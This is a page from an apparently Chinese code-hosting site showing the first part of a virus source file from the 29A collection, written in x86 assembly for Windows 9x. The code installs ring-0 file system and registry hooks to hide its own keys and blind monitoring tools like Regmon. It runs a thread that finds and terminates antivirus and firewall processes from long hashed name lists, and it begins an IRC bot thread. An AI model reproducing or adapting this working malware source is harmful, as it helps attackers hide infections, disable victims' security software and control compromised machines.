29a-7.020
来自「从29A上收集的病毒源码」· 020 代码 · 共 3,316 行 · 第 1/5 页
020
3,316 行
push eax
push eax
VxDcall IFSMGR, InstallFileSystemApiHook
add esp, 4
pop edi
push edi
add edi, __old_hook-stealthsplore_start
stosd
push IFSMGR
pop eax
VMMcall Get_DDB
pop esi
test ecx, ecx
jz __end
push esi
add esi, IFSApiHook_hook-stealthsplore_start
mov ebx, InstallFileSystemApiHook
call hook_service
;pop edi ; uncomment this if u want to to use IFSApiHook..
;push edi
;xchg esi, [edi+_origifshook-stealthsplore_start]
pop esi
push esi
add esi, Ring0_FileIO_hook-stealthsplore_start
mov ebx, Ring0_FileIO
call hook_service
pop edi
xchg esi, [edi+_orig_Ring0_FileIO-stealthsplore_start]
__end: popa
retf
stealthsplore_start: push ebx ; u have no fuckin idea how much gpf did it took me
; to realize that ebx modification fucks-up kernel..
call $+5
_sploredlta: pop ebx
_STLTH2_ equ <-_sploredlta[ebx]>
__quit: db 0beh
__old_hook dd ?
movzx ecx, (ifs_first_run _STLTH2_).byte ptr 0
jecxz __continue
dec (ifs_first_run _STLTH2_).byte ptr 0
lodsd
__find_sys: lodsd
xchg eax, esi
lodsd
xchg eax, ecx
lodsd
cmp eax, ecx
jnz __find_sys
mov (sys_handler _STLTH2_).dword ptr 0, eax
__continue:
mov eax, (sys_handler _STLTH2_).dword ptr 0
pop ebx
jmp eax
IFSApiHook_hook:
; db 0beh ; uncoment this if u want to use this shit somehow..
;_origifshook dd ?
xor eax, eax ; no hook 4u, mister file-wanna-monitor
retn
Ring0_FileIO_hook: push esi
db 0beh
_orig_Ring0_FileIO dd 0
push esi
mov esi, [esp+4]
pusha
call $+5
_r0ifshookdlta: pop ebx
_IFSr0HOOK equ <-_r0ifshookdlta[ebx]>
cmp eax, R0_OPENCREATFILE
jnz __done_cmp
lea edi, _this_name _IFSr0HOOK
dec edi
mov ecx, __this_length _IFSr0HOOK
__do_cmp: lodsb
test al, al
jz __done_cmp
inc edi
cmp al, byte ptr [edi]
loopz __do_cmp
popa
stc
; stealth? either an ifs driver file corruption occured on my haed drive, or non of those r3 file interfaces r
; connected with this... atm, i have no fuckin desire to investigate this further. r0 on w9x sucks!!!
retn
__done_cmp: popa
retn 4
ifs_flag db 0
ifs_first_run db 1
sys_handler dd 0
_this_name db MAX_PATH dup(0)
__this_length dd 0
stealthsplore_size equ $-stealthsplore_start
stealth_thread2 endp
stealth_thread proc pascal
call $+5
stealthdlta: pop ebx
_STLTH equ <-stealthdlta[ebx]>
lea esi, __ring0_code _STLTH
call call_in_ring0
jmp $
__ring0_code: pusha
push PAGEFIXED or PAGEZEROINIT ; flags
xor eax, eax
push eax ; *PhysAddr
push eax ; maxPhys
push eax ; minPhys
push eax ; AlignMask
push eax ; handle of VM (==0 if PG_SYS)
push PG_SYS ; pType
push (stealthcode_size+4095) shr 12 ; nPages
VMMcall PageAllocate
add esp, 8*4
mov [esp.Pushad_eax], eax ; eax = mem handle
push PC_STATIC ; OR_MASK
push not (PC_WRITEABLE+PC_USER) ; AND_MASK
push (stealthcode_size+4095) shr 12
shr eax, 12
push eax
VMMcall PageModifyPermissions ; make pages inaccessible from ring3
add esp, 4*4
mov edi, [esp.Pushad_eax] ; copy some stealthcode
push edi
lea esi, stealthcode_start _STLTH
mov ecx, stealthcode_size
rep movsb
push 1
pop eax
VMMcall Get_DDB
test ecx, ecx
jz __end
pop eax
mov edx, [ecx+30h]
mov [eax+service_ptr_table-stealthcode_start], edx
HOOK_SERVICE _RegEnumKey
HOOK_SERVICE _RegOpenKey
HOOK_SERVICE _RegCreateKey
HOOK_SERVICE _RegDeleteKey
HOOK_SERVICE Hook_DS ; bye bye regmon... :)
NUMBA_HOOKED_SERVICES equ 5
__end: popa
r0__err: retf
stealthcode_start:
hook_RegEnumKey proc c
arg hKey:DWORD
arg iSubKey:DWORD
arg lpszName:DWORD
arg cchName:DWORD
pushf
pusha
call DDB_regenarate
push cchName
push lpszName
push iSubKey
push hKey
db 0b8h
real_RegEnumKey dd ?
call eax
add esp, 4*4
xchg eax, ebx
lea esi, lpszName
lodsd
xchg eax, ecx
jecxz __1
cmp [ecx], "oivE"
jnz __1
cmp [ecx+4], "snIn"
jnz __1
mov ebx, ERROR_NO_MORE_ITEMS
__1: mov [esp.Pushad_eax], ebx
popa
popf
ret
hook_RegEnumKey endp
hook_RegOpenKey proc c
arg hkey
arg lpszSubKey
arg phkResult
pushf
pusha
call DDB_regenarate
lea esi, lpszSubKey
lodsd
xchg eax, ecx
jecxz __open_key
xchg ecx, esi
@endsz
cmp [esi-5], "llat"
jnz __open_key
cmp [esi-9], "snIn"
jnz __open_key
mov eax, ERROR_BADKEY
jmp __end
__open_key: push phkResult
push lpszSubKey
push hkey
db 0b8h
real_RegOpenKey dd ?
call eax
add esp, 3*4
__end: mov [esp.Pushad_eax], eax
popa
popf
ret
hook_RegOpenKey endp
hook_RegCreateKey proc c
arg hkey
arg lpszSubKey
arg phkResult
pushf
pusha
call DDB_regenarate
lea esi, lpszSubKey
lodsd
xchg eax, ecx
jecxz __create_key
xchg ecx, esi
@endsz
cmp [esi-5], "llat"
jnz __create_key
cmp [esi-9], "snIn"
jnz __create_key
mov eax, ERROR_BADKEY
jmp __end
__create_key: push phkResult
push lpszSubKey
push hkey
db 0b8h
real_RegCreateKey dd ?
call eax
add esp, 3*4
__end: mov [esp.Pushad_eax], eax
popa
popf
ret
hook_RegCreateKey endp
hook_RegDeleteKey proc c
arg hKey
arg lpszSubKey
pushf
pusha
call DDB_regenarate
lea esi, lpszSubKey
lodsd
xchg eax, ecx
jecxz __del_key
xchg ecx, esi
@endsz
cmp [esi-5], "llat"
jnz __del_key
cmp [esi-9], "snIn"
jnz __del_key
mov eax, ERROR_FILE_NOT_FOUND
jmp __end
__del_key: push lpszSubKey
push hKey
db 0b8h
real_RegDeleteKey dd ?
call eax
add esp, 8
__end: mov [esp.Pushad_eax], eax
popa
popf
ret
hook_RegDeleteKey endp
hookHook_DS proc c
pusha
call DDB_regenarate
movzx ecx, ax
cmp ecx, _RegOpenKey
jb __check_hook
cmp ecx, _RegSetValueEx
ja __ok_hook
__bad_hook: popa
stc
ret
__check_hook: cmp ecx, Hook_Device_Service
jz __bad_hook
__ok_hook: db 0b8h
realHook_DS dd ?
mov [esp.Pushad_esi], esi
popa
ret
hookHook_DS endp
DDB_regenarate proc c
pusha
db 0bah ; edx
service_ptr_table dd ?
call __service_table
dd _RegEnumKey
@_RegEnumKey dd ?
dd _RegOpenKey
@_RegOpenKey dd ?
dd _RegCreateKey
@_RegCreateKey dd ?
dd _RegDeleteKey
@_RegDeleteKey dd ?
dd Hook_DS
@Hook_DS dd ?
__service_table: pop esi
push NUMBA_HOOKED_SERVICES
pop ecx
__cycle: lodsd
xchg eax, ebx
lodsd
mov [edx+ebx*4], eax
loop __cycle
popa
ret
DDB_regenarate endp
stealthcode_size equ $-stealthcode_start
stealth_thread endp
anti_av_thread proc pascal
local wh
local buffer:byte:512
local pid
local p_handle
local p_entry:PROCESSENTRY32
call $+5
avdelta: pop ebx
_AV equ <-avdelta[ebx]>
mov __av_ebp_patch _AV, ebp
mov __av_ebx_patch _AV, ebx
mov __av_ebp_patch_ _AV, ebp
__kill_av: push ebx
push 0
lea eax, __av_win_enum _AV
push eax
call _EnumWindows _AV
pop ebx
push 0
push TH32CS_SNAPPROCESS
call _CreateToolhelp32Snapshot _AV
inc eax
jz __end__snapshot
dec eax
mov p_handle, eax
lea ecx, p_entry
mov [ecx.dwSize], size PROCESSENTRY32
push ecx
push eax
call _Process32First _AV
__cycle_procs: test eax, eax
jz __proc_done
call _GetCurrentProcessId _AV
cmp eax, p_entry.th32ProcessID
jz __next_proc
lea esi, p_entry.szExeFile
__slash: mov edx, esi
__endsz: lodsb
cmp al, '\'
jz __slash
test al, al
jnz __endsz
mov esi, edx
call lowercase
mov edx, esi
xor eax, eax
__hasherize: rol eax, 7
xor al, [edx]
inc edx
cmp byte ptr [edx], '.'
jz __out
cmp byte ptr [edx], 0
jnz __hasherize
__out: lea edi, good_namez _AV
mov ecx, good_namez_numba
repnz scasd
jz __next_proc
lea edi, bad_namez _AV
mov ecx, bad_namez_numba
repnz scasd
jnz __next_proc
push p_entry.th32ProcessID
push 0
push PROCESS_TERMINATE
call _OpenProcess _AV
push 0
push eax
call _TerminateProcess _AV
__next_proc: lea eax, p_entry
push eax
push p_handle
call _Process32Next _AV
jmp __cycle_procs
test eax, eax
jnz __cycle
pop eax
__proc_done: push p_handle
call _CloseHandle _AV
__end__snapshot: push 50
call _Sleep _AV
jmp __kill_av
__av_win_enum: push ebp
mov ebp, 0
org $-4
__av_ebp_patch dd ?
mov eax, [esp.Pshd.Arg1]
mov wh, eax
pop ebp
pusha
mov ebx, 0
org $-4
__av_ebx_patch dd ?
mov ebp, 0
org $-4
__av_ebp_patch_ dd ?
push ecx
push esp
push wh
call _GetWindowThreadProcessId _AV
pop ecx
mov pid, ecx
jecxz __end__end
push 512
lea esi, buffer
push esi
push wh
call _GetWindowTextA _AV
xchg eax, ecx
jecxz __end__end
call lowercase
push ebx
mov edx, ecx
mov ecx, av_names_numba
lea edi, av_namez_hashes _AV
lea ebx, av_names_length _AV
__process_string: pusha
mov ecx, edx
movzx ebx, [ebx].byte ptr 0
sub ecx, ebx
inc ecx
js __too_lil_end
jecxz __too_lil_end
__cycle: push ebx
push esi
xor edx, edx
__hash: rol edx, 7
xor dl, [esi]
lodsb
dec ebx
jnz __hash
pop esi
pop ebx
lodsb
cmp edx, [edi]
jz __found
loop __cycle
add [esp.Pushad_edi], 4
inc [esp.Pushad_ebx]
popa
loop __process_string
__end__kend: pop ebx
__end__end: popa
push 1
pop eax
retn
__too_lil_end: popa
jmp __end__kend
__found: popa
pop ebx
xor esi, esi
push esi
push esi
push WM_QUIT
push wh
call _PostMessageA _AV
push 10
call _Sleep _AV
push pid
push esi
push PROCESS_TERMINATE
call _OpenProcess _AV
push esi
push eax
call _TerminateProcess _AV
popa
retn
__end: push (h_av_thread G).dword ptr 0
call _CloseHandle _AV
lea eax, anti_av_thread _AV
call Create_Thread ; BUG!!! FIXAJ rel. adr.
mov h_av_thread _AV, eax
push 0
call _ExitThread _AV
av_namez_hashes: whash <virus, anti, firewall, process, zonealarm, amon, nod32, blackice, kill98, norton>
whash <kv3000, cilin, av98, dr.web, trojan, winrescue, lockdown, avp, sophos, f-prot>
whash <mcafee, e-scan, kaspersky, kav, wintop, apispy, apimon, sysview, sysmon, apithunk>
whash <procdump>
av_names_numba equ ($-av_namez_hashes)/4
av_names_numba_start:
av_names_length db 5, 4, 8, 7, 9, 4, 5, 8, 6, 6
db 6, 5, 4, 6, 6, 9, 8, 3, 6, 6
db 6, 6, 9, 3, 6, 6, 6, 7, 6, 8
db 8
good_namez: whash <kernel32, msgsrv32, mprexe, mmtask, mstask, explorer, internat, taskmon, systray, rundll>
whash <wmiexe, winoa386, system, [system|process], [system|idle|process], smss, os2ss, os2srv>
whash <csrss, winlogon, services, lsass, svchost, spoolsv, regsvc, ntvdm, cmd, taskmgr>
whash <nddeagnt, spoolss, rpcss, tapisrv, rasman>
good_namez_numba equ ($-good_namez)/4
bad_namez: whash <pop3scan, nod32, nod32cc, amon, _avp32, _avpcc, npssvc, nresq32, nsched32>
whash <nschednt, nsplugin, nav, navapsvc, navapw32, navlu32, navrunr, navw32, _avpm, alertsvc>
whash <avp32, avpcc, avpm, n32scanw, navwnt, antivir, avpupd, avgctrl, avwin95, scan32, vshwin32>
whash <f-stopw, f-prot95, ackwin32, vettray, vet95, sweep95, pccwin98, iomon98, avptc, ave32>
whash <avconsol, fp-win, dvp95, f-agnt95, claw95, nvc95, scan, virus, lockdown2000, norton>
whash <mcafee, pcciomon, pccmain, pop3trap, webtrap, avsynmgr, vsstat, nmain, luall, lucomserver>
whash <iamapp, atrack, nisserv, rescue32, symproxysvc, nisum, pview95, webscanx, safeweb, icmon>
whash <cfinet, cfinet32, avp, zonealarm, wink, zapro, zatutor, vmon, zauinst, minilog>
whash <lockdown, ants, fast, guard, update, autoupdate, tc, spyxx, clean, drwatson>
whash <sfc, msinfo32, cleaner, lsetup, aupdate, lual, luinit, navstub, bootwarn, qconsole>
whash <qserver, navdx, undoboot, cfgwiz, moolive, tca, tcm, tds-3, ss3edit, anti_trojan>
whash <atcon, atupdater, atwatch, wgfe95, poproxy, nprotect, ndd32, mcagent, mcupdate, watchdog>
whash <taumon, iamaserv, sphinx, vsecomr, icload95, icsupp95, icloadnt, icsuppnt, frw, firewall>
whash <antivirus, blackice, blackd, wrctrl, wradmin, cleaner3, pcfwallicon, aplica32, cfiadmin>
whash <cfiaudit, tds2-98, tds2-nt, nvarch16, vsmain, persfw, pavproxy, mssmmc32, trjscan, defwatch>
whash <vpc42, rtvscn95, vptray, mgui, apvxdwin, fsav, agentsvr, rrguard, rescue, rshell>
whash <apimonitor, cleanpc, pstat, wintop, anti-trojan, borg2, iamserv, vsmon>
bad_namez_numba equ ($-bad_namez)/4
anti_av_thread endp
ircbot_thread: call $+5
bdelta: pop ebp
X equ <-bdelta[ebp]> ; all variables relative to bdelta will be accessed in form of: varname X
sub esp, 512
push esp
push 0101h
callb WSAStartup
add esp, 512
test eax, eax
jnz bot_end
IFDEF IRC_LOG
x_push eax, irclog.log~
mov edx, esp
xor eax, eax
push eax
push eax
push CREATE_ALWAYS
push eax
push FILE_SHARE_READ
push GENERIC_WRITE
push edx
callb CreateFileA ; create log file
x_pop
inc eax
jz bot_end
dec eax
call $+5+4
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?